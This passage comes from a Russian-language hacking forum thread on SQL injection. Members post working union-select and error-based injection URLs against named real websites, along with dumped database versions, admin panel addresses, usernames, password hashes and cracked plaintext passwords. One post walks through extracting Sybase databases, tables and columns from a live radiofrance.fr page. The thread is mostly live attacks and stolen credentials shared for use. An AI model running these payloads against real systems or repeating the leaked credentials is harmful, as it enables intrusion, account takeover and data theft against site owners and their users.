SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Горе-кодеры
    Code:
    http://valera.asf.ru/perl/cookbook/cont.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/*
     
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Парочка хостеров:

    Ни у кого там сайтов нет ? :D

    Этот смешной, там чудо защита какая-то,по ходу на скобки пишет: "I don't like you...", можно подумать я в восторге :D

    _http://fairhost.ru/article.php?sid=-13+union+select+1,2,3,4,5,6,7,8,@@version,0,11/*

    4.0.27-max-log

    -------------------------------------
    _http://www.alestar.biz/index.php?id1=5+and+1=2+union+select+1,2,concat(user(),char(58),version(),char(58),database()),4,5,6/*

    alesta_ya@localhost:4.1.22:alesta_db1

    вывод в исходник
    --------------------------------------
    Таблицы не подобрал
     
    1 person likes this.
  3. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://library.informdon.ru/

    Code:
    http://library.informdon.ru/?p=4&sp=32&tp=2345432+union+select+0,pass,2,3,4,5,6,name+from+admin
    administrator:2001
    Code:
    http://informdon.ru/library/admin/
    OS :Windows NT A10 5.2 build 3790

    там загрузка файла тоже есть имхо
     
  4. Klaus Doring

    Klaus Doring Elder - Старейшина

    Joined:
    23 Jul 2007
    Messages:
    48
    Likes Received:
    16
    Reputations:
    0
    Code:
     http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* 
     
  5. kolka

    kolka New Member

    Joined:
    19 Feb 2008
    Messages:
    4
    Likes Received:
    4
    Reputations:
    0
    Белорусский сайт любителей хоккея. :)

    http://www.belarushockey.com/?commid=-2141'+union+select+1,2,3,concat_ws(char(35),version(),database(),user())/*

    4.0.24_Debian-10sarge1-log#belarushockeycom#belarushockeycom@localhost

    http://www.belarushockey.com/?commid=-2141'+union+select+1,nick,mail,message+from+comment/*

    http://www.belarushockey.com/?commid=-2141'+union+select+1,author,title,text+from+news+where+id=2142/*
     
    3 people like this.
  6. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    http://www.apevia.com/category.php?cid=-14+union+select+1,concat_ws(0x3A3a,user(),database(),version()),3/*
    Есть таблица users.
    Поля не подобрал.

    aspire@localhost::aspire::4.1.22-log
     
  7. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    729
    Likes Received:
    95
    Reputations:
    12
    когдато тоже ломал сайт этот
     
  8. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    www.women-law.org

    wapwebsite@localhost::4.1.22-standard::wapweb

    http://www.women-law.org/program_service.php?pid=-14+union+select+1,2,concat_ws(0x3A3a,username,password),4,5+from+users/*

    melitokagan::ed0c2fc45dd1662774ac8e8a86b9167d: m3k605
    project::5f212e25801eb5a9fd02a0ee62e2fbb9: tap1982
     
    2 people like this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    www.masterphoto.ru

    5.0.45-community/master_masterpho@localhost/master_masterphoto

    http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user/*


    Таблицы:
    user
    Поля:
    name
    email


    Поля с паролями не подобрал
     
    3 people like this.
  10. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2

    http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(user_password,char(58)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users%20where%20user_id=2/*

    masterphoto:786c2704f76e06e44aad1e0213d26018:gbcbrhenj

    http://www.masterphoto.ru/forum/admin/

    там еше и форум есть а я спать :eek:
     
    #5090 Muhacir, 19 Mar 2008
    Last edited: 19 Mar 2008
    1 person likes this.
  11. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    Крупный хостиг в зоне кз
    http://user.kz/files/cifry.php?sid=-9965481+union+select+1,2,3,4,5,6,7/*

    http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC=
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    ReVOLVeR
    Хорош прикалываться
    1.баян
    2.вобще люкс: твой пост
    _http://forum.antichat.ru/showpost.php?p=621958&postcount=5162
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Хм, чето только мускул один, есть же и другие: Postgre, Mssql, Sybase и т.д. осбенно мало на форумах постят про Sybase...
    вобщем Sybase использует Transact-SQL, как например MS Access и MSSQL но они отличаются немного, вот пример:
    Получаем данные через вывод сообщения об ошибке приведения типов.
    версия:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(@@version))--
    текущий пользователь:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(user_name()))--
    имена бд:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins))--
    следующее имя бд:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x73796273797374656D6462)))--
    здесь 0x73796273797374656D6462=hex('sybsystemdb')

    следующее имя:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x726670726F64,0x73796273797374656D6462)))--
    0x726670726F64=hex('rfprod') и т.д.

    узнаем таблицы в бд rfprod (в других по аналогии):
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55))--
    тут надо пояснить, || -знак конкатенации (объединения) в sybase, convert(char,id) нужен для того, что бы привести числовое поле id (очень нужное) к символьному типу, иначе возникнет ошибка несоответствия типов, from+rfprod..sysobjects означает то, что мы выбираем значения из системной таблицы sysobjects базы данных rfprod, в этой таблице хранятся записи об объектах этой бд, но нам нужны не все объекты, а только пользовательские таблицы, они имеют тип U, hex('U')=0x55 (where+type=0x55) надеюсь с этим все понятно

    узнаем имя следующей таблицы:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55+and+id+not+in+(1785877529)))--
    поясню, т.к. id уникально, для перебора удобнее использовать именно его

    узнаем поля таблицы wifi_reactions (id=1785877529) (другие таблицы по аналогии):
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529))--
    Тут тоже нужно пояснить: colid - это идентификационный номер поля, он не несет смысловой нагрузги, но его удобно использовать при переборе, from+rfprod..syscolumns означает то, что мы выбираем значения из системной таблицы syscolumns базы данных rfprod, в этой таблице хранятся записи об колонках этой бд! (а не только одной таблицы), where+id=1785877529 - указывает колонки какой таблицы выбирать, я ранее говорил, что id таблицы очень важное для нас значение, так вот определение того, к какой таблице принадлежит имя поля, происходит именно по id таблицы и только по id

    узнаем имя следующего поля:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529+and+colid+not+in+(4)))--
    и т.д

    получаем данные из таблицы wifi_reactions:
    Code:
    http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(convert(varchar,reactions)||0x3a||ville)+from+rfprod..wifi_reactions))--
    что это такое, фиг его знает, но нам важны не данные, а принцип получения данных, convert(varchar,reactions) - нужен для того, что бы привести данные из поля reactions, которое имеет тип VARBINARY, к типу varchar для совместимости, если этого не сделать, появится ошибка несовместимости типов

    Ну вроде пока все, так вот из обычного поста получилась небольшая статейка для новичков, об SQL-inj в SYBASE Adaptive Server Enterprise

    ЗЫ в ASE жесткое разграничение прав пользователей, для пользователя может быть ограничен доступ не только к БД и таблице БД, но также и к отдельному полю таблицы
     
    #5093 Scipio, 19 Mar 2008
    Last edited: 19 Mar 2008
    5 people like this.
  14. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    462
    Likes Received:
    267
    Reputations:
    15
    http://www.gallery1905.ru/news/more.php?id=-42+union+select+1,version(),3,4,5,6,7,8/*
     
    1 person likes this.
  15. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://www.videoland.nl/index_film_record.php?id=4370455454+union+select+0,1,2+from+a

    таблицы :(

    http://www.seatsandsofas.nl/info.php?id=7&lang_id=1&country_id=1444'union+select+0,1,2,3,4+from+users/*
    +таблицa: admin
     
    #5095 Muhacir, 20 Mar 2008
    Last edited: 20 Mar 2008
    1 person likes this.
  16. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    758
    Likes Received:
    1,053
    Reputations:
    291
    Сервс провайдер на рынке SMS
    + моя первая скуля.
    user: sms@212.111.95.84
    Log: Debian_7etch4-log
    version: 5.0.32
     
    4 people like this.
  17. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    csuser@localhost.localdomain
    citysite
    4.0.16
     
    1 person likes this.
  18. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    webmonger.net
    VERSION: 4.1.22-standard
    USER: webmonge@localhost
    DATABASE: webmonge_webmonger
     
    1 person likes this.
  19. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://www.casinogenie.co.uk/casino_review.php?casinoid=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    root@localhost
    casinogenie
    5.0.24a-Debian_1-log

    Code:
    http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,2,3,4,5/*
     
    1 person likes this.
  20. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://www.sg-bevenrode.de/portal/news2.php?nid=99999+union+select+1,email,name,password,5+from+user

    master@mbhost.de : admin :root
     
Loading...
Thread Status:
Not open for further replies.